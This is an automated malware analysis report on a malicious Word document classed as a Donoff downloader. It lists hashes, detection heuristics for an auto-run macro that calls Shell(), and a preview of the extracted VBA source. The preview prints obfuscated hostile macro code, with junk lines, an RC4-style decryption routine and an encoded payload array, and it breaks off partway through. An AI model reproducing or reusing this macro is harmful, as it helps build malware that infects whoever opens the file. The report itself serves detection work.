Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 baf6604e9adf4a52…

MALICIOUS

Office (OLE)

Size: 222.5 KB
Created: 2016-02-08 19:57:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: f827cecd4646c0c5c124cfdcf9ec4ef4
SHA-1: acf8c78bbef20774a6f5c355148969302ff9571b
SHA-256: baf6604e9adf4a5296c92080fd9fc2bb730021258a71036cf3933656b16b1d99
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The macro is configured to execute automatically when the document is opened (Document_Open). It calls the Shell() function, which fires a critical heuristic and indicates that the macro likely downloads and executes a second-stage payload. The ClamAV detection 'Doc.Downloader.Donoff-9761296-0' further supports this downloader classification.

Heuristics 6

  • ClamAV: Doc.Downloader.Donoff-9761296-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-9761296-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — in document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
    • http://www.iec.ch — in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 80690 bytes
SHA-256: 8fc6b137178525c5d50d6fc5e9070d34373f82de5fe276bf8dcde78c83fbe01d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim AgdFDKavwbfX9KZ(1879) As Long
Function KBu(UElVwbshQ1Y As Integer) As Boolean
DRDo3mB9q = Day(Now)
Static Jcs1u As Byte
RaLkP0weuihoXcIP = Day(Now)
Jcs1u = Jcs1u + 1
RGla3pHotOff = Day(Now)
If Jcs1u = 1 Then Debug.Assert Not KBu(25)
Y1YrLrN9Y89C = Day(Now)
KBu = Jcs1u = 0
Yj3EknPrhbl5 = Day(Now)
Jcs1u = 0
XLQaI5K0S = Day(Now)
End Function
Function ASe6jGF6nrL(YncUSnPH, XsKc9BPHg)
Bxsy09NSrtAFXSupS = Day(Now)
ASe6jGF6nrL = (YncUSnPH And Not XsKc9BPHg) Or (Not YncUSnPH And XsKc9BPHg)
CQBGEBfc6 = Day(Now)
End Function
Function zC(ByVal Character As Integer) As String
Dim bArr(1) As Byte, Byte1  As Byte, Byte2  As Byte, i As Long
If Character < 0 Then Exit Function
If Character > (64 + 805 + 64 - 805 + 64 + 805 + 64 - 805 - 1) Then
Byte1 = Character Mod (64 + 236 + 64 - 236 + 64 + 236 + 64 - 236)
Byte2 = CInt(Character / (64 + 446 + 64 - 446 + 64 + 446 + 64 - 446))
Else
Byte1 = Character
Byte2 = 0
End If
bArr(0) = Byte1
bArr(1) = Byte2
zC = bArr
End Function
Function JI342KnsvL5m9A(G2xqfPYBG4() As Byte, HZ1cBqyR5wAamk() As Byte) As String
On Error Resume Next
Dim VaN6Br0FCHk(0 To 255) As Integer, Ecz5o As Long, U95aKouw4yd2PU As Long, HftHRe2a As Long, HAqIHDTO As Byte, RZ9mrbbv() As Byte, Be8aUB() As Byte
ReDim RZ9mrbbv(YWtuS(G2xqfPYBG4)) As Byte
RZ9mrbbv = G2xqfPYBG4
ReDim Be8aUB(YWtuS(HZ1cBqyR5wAamk)) As Byte
Be8aUB = HZ1cBqyR5wAamk
For Ecz5o = 0 To (64 + 535 + 64 - 535 + 64 + 535 + 64 - 535 - 1)
VaN6Br0FCHk(Ecz5o) = Ecz5o
Next Ecz5o
Ecz5o = 0
U95aKouw4yd2PU = 0
HftHRe2a = 0
For Ecz5o = 0 To (64 + 403 + 64 - 403 + 64 + 403 + 64 - 403 - 1)
U95aKouw4yd2PU = (U95aKouw4yd2PU + VaN6Br0FCHk(Ecz5o) + Be8aUB(Ecz5o Mod (YWtuS(HZ1cBqyR5wAamk) + 1))) Mod ((64 + 151 + 64 - 151 + 64 + 151 + 64 - 151))
HAqIHDTO = VaN6Br0FCHk(Ecz5o)
VaN6Br0FCHk(Ecz5o) = VaN6Br0FCHk(U95aKouw4yd2PU)
VaN6Br0FCHk(U95aKouw4yd2PU) = HAqIHDTO
Next Ecz5o
Ecz5o = 0
U95aKouw4yd2PU = 0
HftHRe2a = 0
For Ecz5o = 0 To YWtuS(G2xqfPYBG4)
U95aKouw4yd2PU = (U95aKouw4yd2PU + 1) Mod (64 + 677 + 64 - 677 + 64 + 677 + 64 - 677)
HftHRe2a = (HftHRe2a + VaN6Br0FCHk(U95aKouw4yd2PU)) Mod (64 + 83 + 64 - 83 + 64 + 83 + 64 - 83)
HAqIHDTO = VaN6Br0FCHk(U95aKouw4yd2PU)
VaN6Br0FCHk(U95aKouw4yd2PU) = VaN6Br0FCHk(HftHRe2a)
VaN6Br0FCHk(HftHRe2a) = HAqIHDTO
RZ9mrbbv(Ecz5o) = ASe6jGF6nrL(RZ9mrbbv(Ecz5o), (VaN6Br0FCHk((VaN6Br0FCHk(U95aKouw4yd2PU) + VaN6Br0FCHk(HftHRe2a)) Mod ((64 + 2 + 64 - 2 + 64 + 2 + 64 - 2)))))
Next Ecz5o
JI342KnsvL5m9A = zTo(RZ9mrbbv)
End Function
Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte
Dim F7 As Long, Ef3I2PixLj As Long
For F7 = 48 To 57
If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For
Ef3I2PixLj = Ef3I2PixLj + 1
Next F7
End Function
Sub Jgg3xYaxe7UwHne9()
AgdFDKavwbfX9KZ(0) = -1730197290
AgdFDKavwbfX9KZ(1) = 857685275
AgdFDKavwbfX9KZ(2) = -790615301
AgdFDKavwbfX9KZ(3) = 220179311
AgdFDKavwbfX9KZ(4) = 2135858122
AgdFDKavwbfX9KZ(5) = -243286572
AgdFDKavwbfX9KZ(6) = 1747253670
AgdFDKavwbfX9KZ(7) = 349895457
AgdFDKavwbfX9KZ(8) = 626958067
AgdFDKavwbfX9KZ(9) = 1067118685
AgdFDKavwbfX9KZ(10) = 1628333412
AgdFDKavwbfX9KZ(11) = 605807207
AgdFDKavwbfX9KZ(12) = 910627020
AgdFDKavwbfX9KZ(13) = 534570972
AgdFDKavwbfX9KZ(14) = -1447703900
AgdFDKavwbfX9KZ(15) = 1935664191
AgdFDKavwbfX9KZ(16) = -744573189
AgdFDKavwbfX9KZ(17) = -707658018
AgdFDKavwbfX9KZ(18) = 191062286
AgdFDKavwbfX9KZ(19) = 540647400
AgdFDKavwbfX9KZ(20) = -935892863
AgdFDKavwbfX9KZ(21) = 88368138
AgdFDKavwbfX9KZ(22) = -1394761355
AgdFDKavwbfX9KZ(23) = 2121572917
AgdFDKavwbfX9KZ(24) = 1044676128
AgdFDKavwbfX9KZ(25) = 1726800548
AgdFDKavwbfX9KZ(26) = 775913805
AgdFDKavwbfX9KZ(27) = -1350155024
AgdFDKavwbfX9KZ(28) = -1483251356
AgdFDKavwbfX9KZ(29) = -337037321
AgdFDKavwbfX9KZ(30) = -1099980950
Ag
... (truncated)